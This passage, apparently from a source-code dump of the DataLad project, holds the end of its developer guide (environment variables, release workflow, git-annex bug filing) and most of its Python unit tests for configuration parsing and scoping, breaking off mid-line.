(@datalad/team-git)\n\n- **gitannex**: git-annex interface (e.g. AnnexRepo, protocols, helpers, compatibility) (@datalad/team-gitannex)\n\n- **remotes**: (special) remote implementations (@datalad/team-remotes)\n\n- **runner**: sub-process execution and IO (@datalad/team-runner)\n\n- **services**: interaction with 3rd-party services (create-sibling*, downloaders, credentials, etc.) (@datalad/team-services)\n\n## Recognizing contributions\n\nWe welcome and recognize all contributions from documentation to testing to code development.\n\nYou can see a list of current contributors in our [zenodo file][link_zenodo].\nIf you are new to the project, don't forget to add your name and affiliation there!\nWe also have an .all-contributorsrc that is updated automatically on merges. Once it's\nmerged, if you helped in a non standard way (e.g., a contribution other than code)\nyou can open a pull request to add any [All Contributors Emoji][contrib_emoji] that\nmatch your contribution types.\n\n## Thank you!\n\nYou're awesome. :wave::smiley:\n\n\n\n# Various hints for developers\n\n## Useful tools\n\n- While performing IO/net heavy operations use [dstat](http://dag.wieers.com/home-made/dstat)\n for quick logging of various health stats in a separate terminal window:\n \n dstat -c --top-cpu -d --top-bio --top-latency --net\n\n- To monitor speed of any data pipelining [pv](http://www.ivarch.com/programs/pv.shtml) is really handy,\n just plug it in the middle of your pipe.\n\n- For remote debugging epdb could be used (avail in pip) by using\n `import epdb; epdb.serve()` in Python code and then connecting to it with\n `python -c \"import epdb; epdb.connect()\".`\n\n- We are using codecov which has extensions for the popular browsers\n (Firefox, Chrome) which annotates pull requests on github regarding changed coverage.\n\n## Useful Environment Variables\n\nRefer datalad/config.py for information on how to add these environment variables to the config file and their naming convention\n\n- *DATALAD_DATASETS_TOPURL*:\n Used to point to an alternative location for `///` dataset. If running\n tests preferred to be set to https://datasets-tests.datalad.org\n- *DATALAD_LOG_LEVEL*:\n Used for control the verbosity of logs printed to stdout while running datalad commands/debugging\n- *DATALAD_LOG_NAME*:\n Whether to include logger name (e.g. `datalad.support.sshconnector`) in the log\n- *DATALAD_LOG_OUTPUTS*:\n Used to control either both stdout and stderr of external commands execution are logged in detail (at DEBUG level)\n- *DATALAD_LOG_PID*\n To instruct datalad to log PID of the process\n- *DATALAD_LOG_TARGET*\n Where to log: `stderr` (default), `stdout`, or another filename\n- *DATALAD_LOG_TIMESTAMP*:\n Used to add timestamp to datalad logs\n- *DATALAD_LOG_TRACEBACK*:\n Runs TraceBack function with collide set to True, if this flag is set to 'collide'.\n This replaces any common prefix between current traceback log and previous invocation with \"...\"\n- *DATALAD_LOG_VMEM*:\n Reports memory utilization (resident/virtual) at every log line, needs `psutil` module\n- *DATALAD_EXC_STR_TBLIMIT*: \n This flag is used by datalad to cap the number of traceback steps included in exception logging and result reporting to DATALAD_EXC_STR_TBLIMIT of pre-processed entries from traceback.\n- *DATALAD_SEED*:\n To seed Python's `random` RNG, which will also be used for generation of dataset UUIDs to make\n those random values reproducible. You might want also to set all the relevant git config variables\n like we do in one of the travis runs\n- *DATALAD_TESTS_TEMP_KEEP*: \n Function rmtemp will not remove temporary file/directory created for testing if this flag is set\n- *DATALAD_TESTS_TEMP_DIR*: \n Create a temporary directory at location specified by this flag.\n It is used by tests to create a temporary git directory while testing git annex archives etc\n- *DATALAD_TESTS_NONETWORK*: \n Skips network tests completely if this flag is set\n Examples include test for S3, git_repositories, OpenfMRI, etc\n- *DATALAD_TESTS_SSH*: \n Skips SSH tests if this flag is **not** set. If you enable this,\n you need to set up a \"datalad-test\" and \"datalad-test2\" target in\n your SSH configuration. The second target is used by only a couple\n of tests, so depending on the tests you're interested in, you can\n get by with only \"datalad-test\" configured.\n\n A Docker image that is used for DataLad's tests is available at\n <https://github.com/datalad-tester/docker-ssh-target>. Note that\n the DataLad tests assume that target files exist in\n `DATALAD_TESTS_TEMP_DIR`, which restricts the \"datalad-test\" target\n to being either the localhost or a container that mounts\n `DATALAD_TESTS_TEMP_DIR`.\n- *DATALAD_TESTS_NOTEARDOWN*: \n Does not execute teardown_package which cleans up temp files and directories created by tests if this flag is set\n- *DATALAD_TESTS_USECASSETTE*:\n Specifies the location of the file to record network transactions by the VCR module.\n Currently used by when testing custom special remotes\n- *DATALAD_TESTS_OBSCURE_PREFIX*:\n A string to prefix the most obscure (but supported by the filesystem test filename\n- *DATALAD_TESTS_PROTOCOLREMOTE*:\n Binary flag to specify whether to test protocol interactions of custom remote with annex\n- *DATALAD_TESTS_RUNCMDLINE*:\n Binary flag to specify if shell testing using shunit2 to be carried out\n- *DATALAD_TESTS_TEMP_FS*:\n Specify the temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation\n- *DATALAD_TESTS_TEMP_FSSIZE*:\n Specify the size of temporary file system to use as loop device for testing DATALAD_TESTS_TEMP_DIR creation\n- *DATALAD_TESTS_NONLO*:\n Specifies network interfaces to bring down/up for testing. Currently used by travis.\n- *DATALAD_TESTS_KNOWNFAILURES_PROBE*:\n Binary flag to test whether \"known failures\" still actually are failures. That\n is - change behavior of tests, that decorated with any of the `known_failure`,\n to not skip, but executed and *fail* if they would pass (indicating that the\n decorator may be removed/reconsidered).\n- *DATALAD_TESTS_GITCONFIG*:\n Additional content to add to `~/.gitconfig` in the tests `HOME` environment. `\\n` is replaced with `os.linesep`.\n- *DATALAD_TESTS_CREDENTIALS*:\n Set to `system` to allow for credentials possibly present in the user/system wide environment to be used.\n- *DATALAD_CMD_PROTOCOL*:\n Specifies the protocol number used by the Runner to note shell command or python function call times and allows for dry runs.\n 'externals-time' for ExecutionTimeExternalsProtocol, 'time' for ExecutionTimeProtocol and 'null' for NullProtocol.\n Any new DATALAD_CMD_PROTOCOL has to implement datalad.support.protocol.ProtocolInterface\n- *DATALAD_CMD_PROTOCOL_PREFIX*:\n Sets a prefix to add before the command call times are noted by DATALAD_CMD_PROTOCOL.\n- *DATALAD_USE_DEFAULT_GIT*:\n Instructs to use `git` as available in current environment, and not the one which possibly comes with git-annex (default behavior).\n- *DATALAD_ASSERT_NO_OPEN_FILES*:\n Instructs test helpers to check for open files at the end of a test. If set, remaining open files are logged at ERROR level. Alternative modes are: \"assert\" (raise AssertionError if any open file is found), \"pdb\"/\"epdb\" (drop into debugger when open files are found, info on files is provided in a \"files\" dictionary, mapping filenames to psutil process objects).\n- *DATALAD_ALLOW_FAIL*:\n Instructs `@never_fail` decorator to allow to fail, e.g. to ease debugging.\n\n# Release(s) workflow\n\n## Branches\n\n- `master`: changes toward the next `MAJOR.MINOR.0` release.\n Release candidates (tagged with an `rcX` suffix) are cut from this branch\n- `maint`: bug fixes for the latest released `MAJOR.MINOR.PATCH`\n- `maint-MAJOR.MINOR`: generally not used, unless some bug fix release with a critical bug fix is needed.\n\n## Workflow\n\n- upon release of `MAJOR.MINOR.0`, `maint` branch needs to be fast-forwarded to that release\n- bug fixes to functionality released within the `maint` branch should be\n submitted against `maint` branch\n- cherry-picking fixes from `master` into `maint` is allowed where needed\n- `master` branch accepts PRs with new functionality\n- `master` branch merges `maint` as frequently as needed\n\n## Helpers\n\n[Makefile](./Makefile) provides a number of useful `make` targets:\n\n- `linkissues-changelog`: converts `(#ISSUE)` placeholders into proper markdown within [CHANGELOG.md]()\n- `update-changelog`: uses above `linkissues-changelog` and updates .rst changelog\n- `release-pypi`: ensures no `dist/` exists yet, creates a wheel and a source distribution and uploads to pypi.\n\n## Releasing with GitHub Actions, auto, and pull requests\n\nNew releases of DataLad are created via a GitHub Actions workflow using [datalad/release-action](https://github.com/datalad/release-action), which was inspired by [`auto`](https://github.com/intuit/auto).\nWhenever a pull request is merged into `maint` that has the \"`release`\" label, that workflow updates the\nchangelog based on the pull requests since the last release, commits the\nresults, tags the new commit with the next version number, and creates a GitHub\nrelease for the tag.\nThis in turn triggers a job for building an sdist & wheel for the project and uploading them to PyPI.\n\n### CHANGELOG entries and labelling pull requests\n\nDataLad uses [scriv](https://github.com/nedbat/scriv/) to maintain [CHANGELOG.md](./CHANGELOG.md).\nAdding label `CHANGELOG-missing` to a PR triggers workflow to add a new `scriv` changelog fragment under `changelog.d/` using PR title as the content.\nThat produced changelog snippet could subsequently tuned to improve perspective CHANGELOG entry.\nThe section that workflow adds to the changelog depends on the `semver-` label added to the PR:\n\n- `semver-minor` — for changes corresponding to an increase in the minor version\n component\n- `semver-patch` — for changes corresponding to an increase in the patch/micro version\n component; this is the default label for unlabelled PRs\n- `semver-internal` — for changes only affecting the internal API\n- `semver-documentation` — for changes only affecting the documentation\n- `semver-tests` — for changes to tests\n- `semver-dependencies` — for updates to dependency versions\n- `semver-performance` — for performance improvements\n\n[link_zenodo]: https://github.com/datalad/datalad/blob/master/.zenodo.json\n[contrib_emoji]: https://allcontributors.org/docs/en/emoji-key\n\n\n## git-annex\n\nEven though git-annex is a separate project, DataLad's and git-annex's development is often intertwined.\n\n## Filing issues\n\nIt is not uncommon to discover potential git-annex bugs or git-annex feature request while working on DataLad.\nIn those cases, it is common for developers and contributors to file an issue in git-annex's public bug tracker at [git-annex.branchable.com](https://git-annex.branchable.com/).\nHere are a few hints on how to go about it:\n\n- You can report a new bug or browse through existing bug reports at [git-annex.branchable.com/bugs](https://git-annex.branchable.com/bugs/))\n- In order to associate a bug report with the DataLad you can add the following mark up into the description: ``[[!tag projects/datalad]]``\n- You can add author metadata with the following mark up: ``[[!meta author=yoh]]``. Some authors will be automatically associated with the DataLad project by git-annex's bug tracker.\n\n## Testing and contributing\n\nTo provide downstream testing of development `git-annex` against DataLad, we maintain the [datalad/git-annex](https://github.com/datalad/git-annex) repository.\nIt provides daily builds of git-annex with CI setup to run git-annex built-in tests and tests of DataLad across all supported operating systems.\nIt also has a facility to test git-annex on *your* client systems following [the instructions](https://github.com/datalad/git-annex/tree/master/clients#testing-git-annex-builds-on-local-clients).\nAll the build logs and artifacts (installer packages etc) for daily builds and releases are collected using [con/tinuous](https://github.com/con/tinuous/) and archived on `smaug:/mnt/btrfs/datasets/datalad/ci/git-annex/`.\nYou can test your fixes for git-annex by submitting patches for it [following instructions](https://github.com/datalad/git-annex#submitting-patches).\n" }, { "alpha_fraction": 0.6258494853973389, "alphanum_fraction": 0.6308821439743042, "avg_line_length": 36.405277252197266, "blob_id": "e5c851e7a2c4f468bab9f582f09ff48982a3db9c", "content_id": "b94d95a9c38e626184246fbc6437e8dcb42ccb81", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31210, "license_type": "permissive", "max_line_length": 398, "num_lines": 834, "path": "/datalad/tests/test_config.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# -*- coding: utf-8 -*-\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nimport logging\nimport os\nfrom os.path import exists\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import create\nfrom datalad.cmd import CommandError\nfrom datalad.config import (\n ConfigManager,\n _where_to_scope,\n parse_gitconfig_dump,\n rewrite_url,\n write_config_section,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n assert_equal,\n assert_false,\n assert_in,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_true,\n chpwd,\n ok_file_has_content,\n with_tempfile,\n with_testsui,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n get_home_envvars,\n swallow_logs,\n)\n\n# XXX tabs are intentional (part of the format)!\n# XXX put back! confuses pep8\n_config_file_content = \"\"\"\\\n[something]\nuser = name=Jane Doe\nuser = [email protected]\nnovalue\nempty =\nmyint = 3\n\n[onemore \"complicated の beast with.dot\"]\nfindme = 5.0\n\"\"\"\n\ngitcfg_dump = \"\"\"\\\ncore.withdot\ntrue\\0just.a.key\\0annex.version\n8\\0filter.with2dots.some\nlong\\ntext with\\nnewlines\\0annex.something\nabcdef\\0\"\"\"\n\n\n# include a \"command line\" origin\ngitcfg_dump_w_origin = \"\"\"\\\nfile:.git/config\\0core.withdot\ntrue\\0file:.git/config\\0just.a.key\\0file:/home/me/.gitconfig\\0annex.version\n8\\0file:.git/config\\0filter.with2dots.some\nlong\\ntext with\\nnewlines\\0file:.git/config\\0command line:\\0annex.something\nabcdef\\0\"\"\"\n\n\ngitcfg_parsetarget = {\n 'core.withdot': 'true',\n 'just.a.key': None,\n 'annex.version': '8',\n 'filter.with2dots.some': 'long\\ntext with\\nnewlines',\n 'annex.something': 'abcdef',\n}\n\n\n_dataset_config_template = {\n 'ds': {\n '.datalad': {\n 'config': _config_file_content}}}\n\n\ndef test_parse_gitconfig_dump():\n # simple case, no origin info, clean output\n parsed, files = parse_gitconfig_dump(gitcfg_dump)\n assert_equal(files, set())\n assert_equal(gitcfg_parsetarget, parsed)\n # now with origin information in the dump\n parsed, files = parse_gitconfig_dump(gitcfg_dump_w_origin, cwd='ROOT')\n assert_equal(\n files,\n # the 'command line:' origin is ignored\n set((Path('ROOT/.git/config'), Path('/home/me/.gitconfig'))))\n assert_equal(gitcfg_parsetarget, parsed)\n\n # now contaminate the output with a prepended error message\n # https://github.com/datalad/datalad/issues/5502\n # must work, but really needs the trailing newline\n parsed, files = parse_gitconfig_dump(\n \"unfortunate stdout\\non more lines\\n\" + gitcfg_dump_w_origin)\n assert_equal(gitcfg_parsetarget, parsed)\n\n\[email protected](\"ignore: 'where=\\\"dataset\\\"' is deprecated\")\[email protected](\"ignore: 'source=\\\"dataset\\\"' is deprecated\")\n@with_tree(tree=_dataset_config_template)\n@with_tempfile(mkdir=True)\ndef test_something(path=None, new_home=None):\n # will refuse to work on dataset without a dataset\n assert_raises(ValueError, ConfigManager, source='branch')\n # now read the example config\n cfg = ConfigManager(GitRepo(opj(path, 'ds'), create=True), source='branch')\n assert_equal(len(cfg), 5)\n assert_in('something.user', cfg)\n # multi-value\n assert_equal(len(cfg['something.user']), 2)\n assert_equal(cfg['something.user'], ('name=Jane Doe', '[email protected]'))\n\n assert_true(cfg.has_section('something'))\n assert_false(cfg.has_section('somethingelse'))\n assert_equal(sorted(cfg.sections()),\n [u'onemore.complicated の beast with.dot', 'something'])\n assert_true(cfg.has_option('something', 'user'))\n assert_false(cfg.has_option('something', 'us?er'))\n assert_false(cfg.has_option('some?thing', 'user'))\n assert_equal(sorted(cfg.options('something')), ['empty', 'myint', 'novalue', 'user'])\n assert_equal(cfg.options(u'onemore.complicated の beast with.dot'), ['findme'])\n\n assert_equal(\n sorted(cfg.items()),\n [(u'onemore.complicated の beast with.dot.findme', '5.0'),\n ('something.empty', ''),\n ('something.myint', '3'),\n ('something.novalue', None),\n ('something.user', ('name=Jane Doe', '[email protected]'))])\n assert_equal(\n sorted(cfg.items('something')),\n [('something.empty', ''),\n ('something.myint', '3'),\n ('something.novalue', None),\n ('something.user', ('name=Jane Doe', '[email protected]'))])\n\n # by default get last value only\n assert_equal(\n cfg.get('something.user'), '[email protected]')\n # but can get all values\n assert_equal(\n cfg.get('something.user', get_all=True),\n ('name=Jane Doe', '[email protected]'))\n assert_raises(KeyError, cfg.__getitem__, 'somedthing.user')\n assert_equal(cfg.getfloat(u'onemore.complicated の beast with.dot', 'findme'), 5.0)\n assert_equal(cfg.getint('something', 'myint'), 3)\n assert_equal(cfg.getbool('something', 'myint'), True)\n # git demands a key without value at all to be used as a flag, thus True\n assert_equal(cfg.getbool('something', 'novalue'), True)\n assert_equal(cfg.get('something.novalue'), None)\n # empty value is False\n assert_equal(cfg.getbool('something', 'empty'), False)\n assert_equal(cfg.get('something.empty'), '')\n assert_equal(cfg.getbool('doesnot', 'exist', default=True), True)\n assert_raises(TypeError, cfg.getbool, 'something', 'user')\n\n # gitpython-style access\n assert_equal(cfg.get('something.myint'), cfg.get_value('something', 'myint'))\n assert_equal(cfg.get_value('doesnot', 'exist', default='oohaaa'), 'oohaaa')\n # weird, but that is how it is\n assert_raises(KeyError, cfg.get_value, 'doesnot', 'exist', default=None)\n\n # modification follows\n cfg.add('something.new', 'の')\n assert_equal(cfg.get('something.new'), u'の')\n # sections are added on demand\n cfg.add('unheard.of', 'fame')\n assert_true(cfg.has_section('unheard.of'))\n comp = cfg.items('something')\n cfg.rename_section('something', 'this')\n assert_true(cfg.has_section('this'))\n assert_false(cfg.has_section('something'))\n # direct comparison would fail, because of section prefix\n assert_equal(len(cfg.items('this')), len(comp))\n # fail if no such section\n with swallow_logs():\n assert_raises(CommandError, cfg.rename_section, 'nothere', 'irrelevant')\n assert_true(cfg.has_option('this', 'myint'))\n cfg.unset('this.myint')\n assert_false(cfg.has_option('this', 'myint'))\n\n # batch a changes\n cfg.add('mike.wants.to', 'know', reload=False)\n assert_false('mike.wants.to' in cfg)\n cfg.add('mike.wants.to', 'eat')\n assert_true('mike.wants.to' in cfg)\n assert_equal(len(cfg['mike.wants.to']), 2)\n\n # set a new one:\n cfg.set('mike.should.have', 'known')\n assert_in('mike.should.have', cfg)\n assert_equal(cfg['mike.should.have'], 'known')\n # set an existing one:\n cfg.set('mike.should.have', 'known better')\n assert_equal(cfg['mike.should.have'], 'known better')\n # set, while there are several matching ones already:\n cfg.add('mike.should.have', 'a meal')\n assert_equal(len(cfg['mike.should.have']), 2)\n # raises with force=False\n assert_raises(CommandError,\n cfg.set, 'mike.should.have', 'a beer', force=False)\n assert_equal(len(cfg['mike.should.have']), 2)\n # replaces all matching ones with force=True\n cfg.set('mike.should.have', 'a beer', force=True)\n assert_equal(cfg['mike.should.have'], 'a beer')\n\n # test deprecated 'where' interface and old 'dataset' (not 'branch') value\n # TODO: remove along with the removal of deprecated 'where'\n cfg.set('mike.should.have', 'wasknown', where='dataset')\n assert_equal(cfg['mike.should.have'], 'wasknown')\n assert_equal(cfg.get_from_source('dataset', 'mike.should.have'), 'wasknown')\n\n # fails unknown location\n assert_raises(ValueError, cfg.add, 'somesuch', 'shit', scope='umpalumpa')\n\n # very carefully test non-local config\n # so carefully that even in case of bad weather Yarik doesn't find some\n # lame datalad unittest sections in his precious ~/.gitconfig\n\n # Note: An easier way to test this, would be to just set GIT_CONFIG_GLOBAL\n # to point somewhere else. However, this is not supported by git before\n # 2.32. Hence, stick with changed HOME in this test, but be sure to unset a\n # possible GIT_CONFIG_GLOBAL in addition.\n\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(new_home))\n with patch.dict('os.environ',\n dict(patched_env, DATALAD_SNEAKY_ADDITION='ignore'),\n clear=True):\n global_gitconfig = opj(new_home, '.gitconfig')\n assert(not exists(global_gitconfig))\n globalcfg = ConfigManager()\n assert_not_in('datalad.unittest.youcan', globalcfg)\n assert_in('datalad.sneaky.addition', globalcfg)\n cfg.add('datalad.unittest.youcan', 'removeme', scope='global')\n assert(exists(global_gitconfig))\n # it did not go into the dataset's config!\n assert_not_in('datalad.unittest.youcan', cfg)\n # does not monitor additions!\n globalcfg.reload(force=True)\n assert_in('datalad.unittest.youcan', globalcfg)\n with swallow_logs():\n assert_raises(\n CommandError,\n globalcfg.unset,\n 'datalad.unittest.youcan',\n scope='local')\n assert(globalcfg.has_section('datalad.unittest'))\n globalcfg.unset('datalad.unittest.youcan', scope='global')\n # but after we unset the only value -- that section is no longer listed\n assert (not globalcfg.has_section('datalad.unittest'))\n assert_not_in('datalad.unittest.youcan', globalcfg)\n ok_file_has_content(global_gitconfig, \"\")\n\n cfg = ConfigManager(\n Dataset(opj(path, 'ds')),\n source='branch',\n overrides={'datalad.godgiven': True})\n assert_equal(cfg.get('datalad.godgiven'), True)\n # setter has no effect\n cfg.set('datalad.godgiven', 'false')\n assert_equal(cfg.get('datalad.godgiven'), True)\n\n\n@with_tree(tree={\n '.gitconfig': \"\"\"\\\n[includeIf \"gitdir:**/devbgc/**\"]\n path = ~/.gitconfig_bgc\n\n[custom \"datalad\"]\n variable = value\n\"\"\"})\ndef test_includeif_breaking(new_home=None):\n patched_env = os.environ.copy()\n patched_env.pop('GIT_CONFIG_GLOBAL', None)\n patched_env.update(get_home_envvars(new_home))\n with patch.dict('os.environ', patched_env, clear=True):\n cfg = ConfigManager()\n # just want to make sure we read it and didn't crash\n assert cfg.get('custom.datalad.variable') == \"value\"\n\n\n@with_tree(tree={\n 'ds': {\n '.datalad': {\n 'config': \"\"\"\\\n[crazy]\n fa = !git remote | xargs -r -I REMOTE /bin/bash -c 'echo I: Fetching from REMOTE && git fetch --prune REMOTE && git fetch -t REMOTE' && [ -d .git/svn ] && bash -c 'echo I: Fetching from SVN && git svn fetch' || : && [ -e .gitmodules ] && bash -c 'echo I: Fetching submodules && git submodule foreach git fa' && [ -d .git/sd ] && bash -c 'echo I: Fetching bugs into sd && git-sd pull --all' || :\n pa = !git paremotes | tr ' ' '\\\\n' | xargs -r -l1 git push\n pt = !git testremotes | tr ' ' '\\\\n' | xargs -r -l1 -I R git push -f R master\n ptdry = !git testremotes | tr ' ' '\\\\n' | xargs -r -l1 -I R git push -f --dry-run R master\n padry = !git paremotes | tr ' ' '\\\\n' | xargs -r -l1 git push --dry-run\n\"\"\"}}})\ndef test_crazy_cfg(path=None):\n cfg = ConfigManager(GitRepo(opj(path, 'ds'), create=True), source='branch')\n assert_in('crazy.padry', cfg)\n # make sure crazy config is not read when in local mode\n cfg = ConfigManager(Dataset(opj(path, 'ds')), source='local')\n assert_not_in('crazy.padry', cfg)\n # it will make it in in 'any' mode though\n cfg = ConfigManager(Dataset(opj(path, 'ds')), source='any')\n assert_in('crazy.padry', cfg)\n # typos in the source mode arg will not have silent side-effects\n assert_raises(\n ValueError, ConfigManager, Dataset(opj(path, 'ds')), source='locale')\n\n\n@with_tempfile\ndef test_obtain(path=None):\n ds = create(path)\n cfg = ConfigManager(ds)\n dummy = 'datalad.test.dummy'\n # we know nothing and we don't know how to ask\n assert_raises(RuntimeError, cfg.obtain, dummy)\n # can report known ones\n cfg.add(dummy, '5.3')\n assert_equal(cfg.obtain(dummy), '5.3')\n # better type\n assert_equal(cfg.obtain(dummy, valtype=float), 5.3)\n # don't hide type issues, float doesn't become an int magically\n assert_raises(ValueError, cfg.obtain, dummy, valtype=int)\n # inject some prior knowledge\n from datalad.interface.common_cfg import definitions as cfg_defs\n cfg_defs[dummy] = dict(type=float)\n # no we don't need to specify a type anymore\n assert_equal(cfg.obtain(dummy), 5.3)\n # but if we remove the value from the config, all magic is gone\n cfg.unset(dummy)\n # we know nothing and we don't know how to ask\n assert_raises(RuntimeError, cfg.obtain, dummy)\n\n #\n # test actual interaction\n #\n @with_testsui()\n def ask():\n # fail on unknown dialog type\n assert_raises(ValueError, cfg.obtain, dummy, dialog_type='Rorschach_test')\n ask()\n\n # ask nicely, and get a value of proper type using the preconfiguration\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(\n cfg.obtain(dummy, dialog_type='question', text='Tell me'), 5.3)\n ask()\n\n # preconfigure even more, to get the most compact call\n cfg_defs[dummy]['ui'] = ('question', dict(text='tell me', title='Gretchen Frage'))\n\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(cfg.obtain(dummy), 5.3)\n ask()\n\n @with_testsui(responses='murks')\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy)\n ask()\n\n # fail to store when destination is not specified, will not even ask\n @with_testsui()\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy, store=True)\n ask()\n\n # but we can preconfigure it\n cfg_defs[dummy]['destination'] = 'broken'\n\n @with_testsui(responses='5.3')\n def ask():\n assert_raises(ValueError, cfg.obtain, dummy, store=True)\n ask()\n\n # fixup destination\n cfg_defs[dummy]['destination'] = 'branch'\n\n @with_testsui(responses='5.3')\n def ask():\n assert_equal(cfg.obtain(dummy, store=True), 5.3)\n ask()\n\n # now it won't have to ask again\n @with_testsui()\n def ask():\n assert_equal(cfg.obtain(dummy), 5.3)\n ask()\n\n # wipe it out again\n cfg.unset(dummy)\n assert_not_in(dummy, cfg)\n\n # XXX cannot figure out how I can simulate a simple <Enter>\n ## respond with accepting the default\n #@with_testsui(responses=...)\n #def ask():\n # assert_equal(cfg.obtain(dummy, default=5.3), 5.3)\n #ask()\n\n\ndef test_from_env():\n cfg = ConfigManager()\n assert_not_in('datalad.crazy.cfg', cfg)\n with patch.dict('os.environ',\n {'DATALAD_CRAZY_CFG': 'impossibletoguess'}):\n cfg.reload()\n assert_in('datalad.crazy.cfg', cfg)\n assert_equal(cfg['datalad.crazy.cfg'], 'impossibletoguess')\n # not in dataset-only mode\n cfg = ConfigManager(Dataset('nowhere'), source='branch')\n assert_not_in('datalad.crazy.cfg', cfg)\n # check env trumps override\n cfg = ConfigManager()\n assert_not_in('datalad.crazy.override', cfg)\n cfg.set('datalad.crazy.override', 'fromoverride', scope='override')\n cfg.reload()\n assert_equal(cfg['datalad.crazy.override'], 'fromoverride')\n with patch.dict('os.environ',\n {'DATALAD_CRAZY_OVERRIDE': 'fromenv'}):\n cfg.reload()\n assert_equal(cfg['datalad.crazy.override'], 'fromenv')\n\n\ndef test_from_env_overrides():\n cfg = ConfigManager()\n assert_not_in(\"datalad.FoO\", cfg)\n\n # Some details, like case and underscores, cannot be handled by the direct\n # environment variable mapping.\n with patch.dict(\"os.environ\",\n {\"DATALAD_FOO\": \"val\"}):\n cfg.reload()\n assert_not_in(\"datalad.FoO\", cfg)\n assert_equal(cfg[\"datalad.foo\"], \"val\")\n\n # But they can be handled via DATALAD_CONFIG_OVERRIDES_JSON.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"datalad.FoO\": \"val\"}'}):\n cfg.reload()\n assert_equal(cfg[\"datalad.FoO\"], \"val\")\n\n # DATALAD_CONFIG_OVERRIDES_JSON isn't limited to datalad variables.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"a.b.c\": \"val\"}'}):\n cfg.reload()\n assert_equal(cfg[\"a.b.c\"], \"val\")\n\n # Explicitly provided DATALAD_ variables take precedence over those in\n # DATALAD_CONFIG_OVERRIDES_JSON.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{\"datalad.foo\": \"val\"}',\n \"DATALAD_FOO\": \"val-direct\"}):\n cfg.reload()\n assert_equal(cfg[\"datalad.foo\"], \"val-direct\")\n\n # JSON decode errors don't lead to crash.\n with patch.dict(\"os.environ\",\n {\"DATALAD_CONFIG_OVERRIDES_JSON\": '{'}):\n with swallow_logs(logging.WARNING) as cml:\n cfg.reload()\n assert_in(\"Failed to load DATALAD_CONFIG_OVERRIDE\", cml.out)\n\n\ndef test_overrides():\n cfg = ConfigManager()\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', cfg)\n # set\n cfg.set('user.name', 'myoverride', scope='override')\n assert_equal(cfg['user.name'], 'myoverride')\n # unset just removes override, not entire config\n cfg.unset('user.name', scope='override')\n assert_in('user.name', cfg)\n assert_not_equal('user.name', 'myoverride')\n # add\n # there is no initial increment\n cfg.add('user.name', 'myoverride', scope='override')\n assert_equal(cfg['user.name'], 'myoverride')\n # same as with add, not a list\n assert_equal(cfg['user.name'], 'myoverride')\n # but then there is\n cfg.add('user.name', 'myother', scope='override')\n assert_equal(cfg['user.name'], ['myoverride', 'myother'])\n # rename\n assert_not_in('ups.name', cfg)\n cfg.rename_section('user', 'ups', scope='override')\n # original variable still there\n assert_in('user.name', cfg)\n # rename of override in effect\n assert_equal(cfg['ups.name'], ['myoverride', 'myother'])\n # remove entirely by section\n cfg.remove_section('ups', scope='override')\n from datalad.utils import Path\n assert_not_in(\n 'ups.name', cfg,\n (cfg._stores,\n cfg.overrides,\n ))\n\n\ndef test_rewrite_url():\n test_cases = (\n # no match\n ('unicorn', 'unicorn'),\n # custom label replacement\n ('example:datalad/datalad.git', '[email protected]:datalad/datalad.git'),\n # protocol enforcement\n ('git://example.com/some', 'https://example.com/some'),\n # multi-match\n ('mylabel', 'ria+ssh://fully.qualified.com'),\n ('myotherlabel', 'ria+ssh://fully.qualified.com'),\n # conflicts, same label pointing to different URLs\n ('conflict', 'conflict'),\n # also conflicts, but hidden in a multi-value definition\n ('conflict2', 'conflict2'),\n )\n cfg_in = {\n # label rewrite\n '[email protected]:': 'example:',\n # protocol change\n 'https://example': 'git://example',\n # multi-value\n 'ria+ssh://fully.qualified.com': ('mylabel', 'myotherlabel'),\n # conflicting definitions\n 'http://host1': 'conflict',\n 'http://host2': 'conflict',\n # hidden conflict\n 'http://host3': 'conflict2',\n 'http://host4': ('someokish', 'conflict2'),\n }\n cfg = {\n 'url.{}.insteadof'.format(k): v\n for k, v in cfg_in.items()\n }\n for input, output in test_cases:\n with swallow_logs(logging.WARNING) as msg:\n assert_equal(rewrite_url(cfg, input), output)\n if input.startswith('conflict'):\n assert_in(\"Ignoring URL rewrite\", msg.out)\n\n\n# https://github.com/datalad/datalad/issues/4071\n@with_tempfile()\n@with_tempfile()\ndef test_no_leaks(path1=None, path2=None):\n ds1 = Dataset(path1).create()\n ds1.config.set('i.was.here', 'today', scope='local')\n assert_in('i.was.here', ds1.config.keys())\n ds1.config.reload()\n assert_in('i.was.here', ds1.config.keys())\n # now we move into this one repo, and create another\n # make sure that no config from ds1 leaks into ds2\n with chpwd(path1):\n ds2 = Dataset(path2)\n assert_not_in('i.was.here', ds2.config.keys())\n ds2.config.reload()\n assert_not_in('i.was.here', ds2.config.keys())\n\n ds2.create()\n assert_not_in('i.was.here', ds2.config.keys())\n\n # and that we do not track the wrong files\n assert_not_in(ds1.pathobj / '.git' / 